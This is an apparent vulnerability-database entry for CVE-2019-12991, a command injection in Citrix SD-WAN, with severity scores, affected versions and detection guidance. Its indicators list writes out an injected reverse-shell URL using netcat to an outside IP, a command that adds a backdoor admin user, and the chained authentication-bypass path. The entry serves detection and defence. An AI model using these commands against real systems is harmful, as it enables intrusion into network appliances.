cbcvebase.
CVE-2019-12991
published 2019-07-16

CVE-2019-12991: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 5 of 6).

PriorityP191high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
73.88%
99.4th percentile
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 5 of 6).

Affected

6 ranges
VendorProductVersion rangeFixed in
citrixcitrix_sd-wan
citrixnetscaler_adc_gateway
citrixnetscaler_sd-wan>= 10.0.0 < 10.0.810.0.8
citrixsd-wan
citrixsd-wan>= 10.2.0 < 10.2.310.2.3
citrixxenserver

Detection & IOCsextracted from sources · hover to see the quote

path/cgi-bin/installpatch.cgi
url/cgi-bin/installpatch.cgi?swc-token=01234&installfile=`sudo%20nc%20-nv%20192.168.1.191%204444%20-e%20/bin/bash`
path/sdwan/nitro/v1/config/get_package_file
commandsudo nc -nv %s %d -e /bin/bash
commandperl /home/talariuser/bin/user_management.pl addUser eviladmin evilpassword 1
path/tmp/token_
path/home/talariuser/bin/user_management.pl
  • Detect HTTP GET requests to /cgi-bin/installpatch.cgi containing backtick-wrapped OS commands in the 'installfile' parameter, indicative of command injection exploitation.
  • Alert on HTTP requests to /cgi-bin/installpatch.cgi where the 'installfile' query parameter contains shell metacharacters such as backticks or pipe characters.
  • Monitor for HTTP POST requests to /sdwan/nitro/v1/config/get_package_file?action=file_download with the 'SSL_CLIENT_VERIFY: SUCCESS' header set by a client (not the TLS layer), as this is used to bypass authentication in the chained exploit.
  • Look for execution of 'nc' or 'netcat' with '-e /bin/bash' arguments spawned by the web server process (e.g., apache/httpd), indicating successful reverse shell via CVE-2019-12991.
  • Monitor for execution of user_management.pl with 'addUser' arguments from non-administrative sessions, indicating post-exploitation privilege escalation on the appliance.
  • ·The command injection (CVE-2019-12991) requires prior authentication; however, it can be chained with the unauthenticated SQL injection (CVE-2019-12989) to achieve full unauthenticated RCE. Detection logic should account for both the standalone authenticated case and the chained unauthenticated exploit path.
  • ·The swc-token value used in the installpatch.cgi exploit URL is dynamically generated (random 5-digit integer) during the SQL injection phase; detection rules should match on the parameter name pattern rather than a static token value.
  • ·The exploit expects a ReadTimeout on the command injection request as the success indicator (reverse shell blocks the response); network-level detection should not rely solely on HTTP response codes for this endpoint.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck8.8HIGH
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.